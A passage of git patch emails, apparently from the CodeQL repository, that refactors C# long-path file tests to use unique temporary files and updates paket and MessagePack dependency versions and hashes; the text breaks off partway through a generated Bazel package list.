``Microsoft.Extensions.Hosting``, ``Microsoft.Extensions.Http``, ``Microsoft.Extensions.Logging``, ``Microsoft.Extensions.Options``, ``Microsoft.Extensions.Primitives``, ``Microsoft.Interop``, ``Microsoft.JSInterop``, ``Microsoft.NET.Build.Tasks``, ``Microsoft.NET.Sdk.WebAssembly``, ``Microsoft.NET.WebAssembly.Webcil``, ``Microsoft.VisualBasic``, ``Microsoft.WebAssembly.Build.Tasks``, ``Microsoft.Win32``, ``Mono.Linker``, ``MySql.Data.MySqlClient``, ``Newtonsoft.Json``, ``SourceGenerators``, ``Windows.Security.Cryptography.Core``",59,2073,150,2 + Totals,,106,12899,398,7 From 4275813b87f5d1cba5d5f2694544579538a9a01c Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 16:31:11 +0100 Subject: [PATCH 0963/1267] C#: Make the path tests independent. --- .../extractor/Semmle.Util.Tests/LongPaths.cs | 200 ++++++++++-------- 1 file changed, 117 insertions(+), 83 deletions(-) diff --git a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs index c1583e27503..90607bc8f02 100644 --- a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs +++ b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs @@ -1,5 +1,6 @@ using Xunit; using System; +using System.Collections.Generic; using System.IO; using System.Linq; using Semmle.Util; @@ -10,39 +11,51 @@ namespace SemmleTests.Semmle.Util /// Ensure that the Extractor works with long paths. /// These should be handled by .NET Core. /// - public sealed class LongPaths : IDisposable + public sealed class LongPaths { private static readonly string tmpDir = Environment.GetEnvironmentVariable("TEST_TMPDIR") ?? Path.GetTempPath(); - private static readonly string shortPath = Path.Combine(tmpDir, "test.txt"); - private static readonly string longPath = Path.Combine(tmpDir, "aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + private static readonly string longPathDir = Path.Combine(tmpDir, "aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "ccccccccccccccccccccccccccccccc", "ddddddddddddddddddddddddddddddddddddd", "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", "fffffffffffffffffffffffffffffffff", - "ggggggggggggggggggggggggggggggggggg", "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhh", "iiiiiiiiiiiiiiii.txt"); + "ggggggggggggggggggggggggggggggggggg", "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhh"); + + private static string MakeLongPath() + { + var uniquePostfix = Guid.NewGuid().ToString("N"); + return Path.Combine(longPathDir, $"iiiiiiiiiiiiiiii{uniquePostfix}.txt"); + } + + private static string MakeShortPath() + { + var uniquePostfix = Guid.NewGuid().ToString("N"); + return Path.Combine(tmpDir, $"test{uniquePostfix}.txt"); + } public LongPaths() { - CleanUp(); + // Create directory to avoid directory not found exceptions when deleting files + Directory.CreateDirectory(longPathDir); } - public void Dispose() + private static void Cleanup(params IEnumerable paths) { - CleanUp(); + foreach (var path in paths) + { + File.Delete(path); + } } - private static void CleanUp() + private static void WithSetUpAndTearDown(Action test) { + var longPath = MakeLongPath(); + var shortPath = MakeShortPath(); + Cleanup(longPath, shortPath); try { - File.Delete(shortPath); + test(longPath, shortPath); } - catch (DirectoryNotFoundException) - { - } - try - { - File.Delete(longPath); - } - catch (DirectoryNotFoundException) + finally { + Cleanup(longPath, shortPath); } } @@ -63,122 +76,143 @@ namespace SemmleTests.Semmle.Util [Fact] public void Delete() { - // OK Do not exist. - File.Delete(shortPath); - File.Delete(longPath); + WithSetUpAndTearDown((longPath, shortPath) => + { + // OK Do not exist. + File.Delete(shortPath); + File.Delete(longPath); + }); } [Fact] public void Move() { - File.WriteAllText(shortPath, "abc"); - Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); - File.Delete(longPath); - File.Move(shortPath, longPath); - File.Move(longPath, shortPath); - Assert.Equal("abc", File.ReadAllText(shortPath)); + WithSetUpAndTearDown((longPath, shortPath) => + { + File.WriteAllText(shortPath, "abc"); + File.Delete(longPath); + File.Move(shortPath, longPath); + File.Move(longPath, shortPath); + Assert.Equal("abc", File.ReadAllText(shortPath)); + }); } [Fact] public void Replace() { - File.WriteAllText(shortPath, "abc"); - File.Delete(longPath); - Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); - File.Move(shortPath, longPath); - File.WriteAllText(shortPath, "def"); - FileUtils.MoveOrReplace(shortPath, longPath); - File.WriteAllText(shortPath, "abc"); - FileUtils.MoveOrReplace(longPath, shortPath); - Assert.Equal("def", File.ReadAllText(shortPath)); + WithSetUpAndTearDown((longPath, shortPath) => + { + File.WriteAllText(shortPath, "abc"); + File.Move(shortPath, longPath); + File.WriteAllText(shortPath, "def"); + FileUtils.MoveOrReplace(shortPath, longPath); + File.WriteAllText(shortPath, "abc"); + FileUtils.MoveOrReplace(longPath, shortPath); + Assert.Equal("def", File.ReadAllText(shortPath)); + }); } - private readonly byte[] buffer1 = new byte[10] { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }; + private readonly byte[] buffer1 = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }; [Fact] public void CreateShortStream() { - var buffer2 = new byte[10]; - - using (var s1 = new FileStream(shortPath, FileMode.Create, FileAccess.Write, FileShare.None)) + WithSetUpAndTearDown((_, shortPath) => { - s1.Write(buffer1, 0, 10); - } + var buffer2 = new byte[10]; - using (var s2 = new FileStream(shortPath, FileMode.Open, FileAccess.Read, FileShare.None)) - { - Assert.Equal(10, s2.Read(buffer2, 0, 10)); - Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); - } + using (var s1 = new FileStream(shortPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s1.Write(buffer1, 0, 10); + } + + using (var s2 = new FileStream(shortPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + Assert.Equal(10, s2.Read(buffer2, 0, 10)); + Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); + } + }); } [Fact] public void CreateLongStream() { - var buffer2 = new byte[10]; - - Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); - - using (var s3 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + WithSetUpAndTearDown((longPath, _) => { - s3.Write(buffer1, 0, 10); - } + var buffer2 = new byte[10]; - using (var s4 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) - { - Assert.Equal(10, s4.Read(buffer2, 0, 10)); - Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); - } + Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); + + using (var s3 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s3.Write(buffer1, 0, 10); + } + + using (var s4 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + Assert.Equal(10, s4.Read(buffer2, 0, 10)); + Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); + } + }); } [Fact] public void FileDoesNotExist() { - // File does not exist - Assert.Throws(() => + WithSetUpAndTearDown((longPath, _) => { - using (new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + // File does not exist + Assert.Throws(() => { - // - } + using (new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + // + } + }); }); } [Fact] public void OverwriteFile() { - using (var s1 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + WithSetUpAndTearDown((longPath, _) => { - s1.Write(buffer1, 0, 10); - } + using (var s1 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s1.Write(buffer1, 0, 10); + } - byte[] buffer2 = { 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 }; + byte[] buffer2 = { 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 }; - using (var s2 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) - { - s2.Write(buffer2, 0, 10); - } + using (var s2 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s2.Write(buffer2, 0, 10); + } - byte[] buffer3 = new byte[10]; + byte[] buffer3 = new byte[10]; - using (var s3 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) - { - Assert.Equal(10, s3.Read(buffer3, 0, 10)); - } + using (var s3 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + Assert.Equal(10, s3.Read(buffer3, 0, 10)); + } - Assert.True(Enumerable.SequenceEqual(buffer2, buffer3)); + Assert.True(Enumerable.SequenceEqual(buffer2, buffer3)); + }); } [Fact] public void LongFileExists() { - Assert.False(File.Exists("no such file")); - Assert.False(File.Exists("\":")); - Assert.False(File.Exists(@"C:\")); // A directory + WithSetUpAndTearDown((longPath, _) => + { + Assert.False(File.Exists("no such file")); + Assert.False(File.Exists("\":")); + Assert.False(File.Exists(@"C:\")); // A directory - Assert.False(File.Exists(longPath)); - new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None).Close(); - Assert.True(File.Exists(longPath)); + Assert.False(File.Exists(longPath)); + new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None).Close(); + Assert.True(File.Exists(longPath)); + }); } } } From 37982f5854731e1882965b10f3b24d6e271b8a82 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 10:11:05 +0100 Subject: [PATCH 0964/1267] C#: Update paket dotnet tool. --- csharp/.config/dotnet-tools.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/csharp/.config/dotnet-tools.json b/csharp/.config/dotnet-tools.json index 16d0d2fef4f..f6b7213de59 100644 --- a/csharp/.config/dotnet-tools.json +++ b/csharp/.config/dotnet-tools.json @@ -3,10 +3,10 @@ "isRoot": true, "tools": { "paket": { - "version": "9.0.1", + "version": "9.0.2", "commands": [ "paket" ] } } -} \ No newline at end of file +} From 083533a6738c05434ccc697484b80993393996ba Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 10:11:27 +0100 Subject: [PATCH 0965/1267] C#: Update paket dependencies lock file. --- csharp/paket.lock | 10 +++++----- csharp/paket.main.bzl | 6 +++--- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/csharp/paket.lock b/csharp/paket.lock index 1d8e48895b3..795b9d0cfe1 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -12,12 +12,12 @@ NUGET MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (3.0.3) - MessagePack.Annotations (>= 3.0.3) - MessagePackAnalyzer (>= 3.0.3) + MessagePack (3.0.300) + MessagePack.Annotations (>= 3.0.300) + MessagePackAnalyzer (>= 3.0.300) Microsoft.NET.StringTools (>= 17.11.4) - MessagePack.Annotations (3.0.3) - MessagePackAnalyzer (3.0.3) + MessagePack.Annotations (3.0.300) + MessagePackAnalyzer (3.0.300) Microsoft.Bcl.AsyncInterfaces (9.0) Microsoft.Build (17.12.6) Microsoft.Build.Framework (>= 17.12.6) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index 4887b7c333f..e87f635dee0 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl @@ -9,9 +9,9 @@ def main(): packages = [ {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.4", "sha512": "sha512-VJMBSOOcdPD6ihA5k1gnVkDbH9GCABmx1055fFikEImT2dFp4yZhN7zMd8PW14tIb3BXIieP557n8xE+J2Y8Dw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "3.0.3", "sha512": "sha512-rFOP00M8dZRRVVjg11M79hU9lhMziIkmqIc9CQ9QhK0R+us1mmpuEGwvnFupqN4F3zYEEoAM36SAdVC+i+mw+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.3", "sha512": "sha512-LYOfElsnLTHsEs7VRd07mBiQjJos15mst8jP0v0zRx+t1OgUMUbbmQx6yO2fOww7vCyaX7vwXsoNuVJSdJdHPA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePackAnalyzer", "id": "MessagePackAnalyzer", "version": "3.0.3", "sha512": "sha512-gsMDGQbQv5dwGGKo2N6mC4TvIVaqKHqowgtqOMcVDLPnYUFdCViW2A+sssnBXJLR4m+zbFVHI7EBSR86svG+AQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "3.0.300", "sha512": "sha512-5Mdl6CrQcxVVLawvqebPLALFdIMgWOnEGxxFvXWjJ/8KGyyhbfKMusj34Wv1AwE+uE9VAb+McVxtR9HDZIUwuA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.300", "sha512": "sha512-Jh9+7EsDtDSEciX8RfXHWxtRlC94wvCmmv+sFzGdzPF4fAp7OAGFktzViPBHMkCxrSh3hmM7jGUB7yMyUmzRCA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePackAnalyzer", "id": "MessagePackAnalyzer", "version": "3.0.300", "sha512": "sha512-Ad0UHGpotoXZYkBjJgO5Z1aTJz5YIsFGVrxc75OiHO/fNKSRKFiM1X2E1WTB5h7pk3uDzqXfh0M5fEEQVZ8FiQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], 